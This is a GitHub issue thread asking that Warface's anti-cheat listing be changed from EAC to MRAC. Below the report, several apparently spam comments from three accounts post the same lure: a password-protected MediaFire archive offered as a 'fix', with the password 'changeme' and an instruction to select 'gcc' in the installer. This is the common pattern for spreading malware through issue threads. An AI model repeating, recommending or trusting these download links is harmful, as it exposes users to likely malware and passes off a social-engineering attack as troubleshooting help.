### ISSUE TITLE
Update Warface

### ISSUE THREAD

**Issue by Levak** [AreWeAntiCheatYet/AreWeAntiCheatYet#1711]
### Game Title

Warface

### Status of the Anti-Cheat

😥 Broken

### Tinkering Steps

The website indicates that Warface uses EAC which is wrong since 2017. In 2017, my.com bought the EU and NA versions and switched to MRAC (MailRuAntiCheat).

It's the same for Warface Clutch (historical EU/NA), do you need another ticket?
https://pc.wfclutch.com/en/anticheat

### Proof of Mention

https://ru.warface.com/anticheat

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
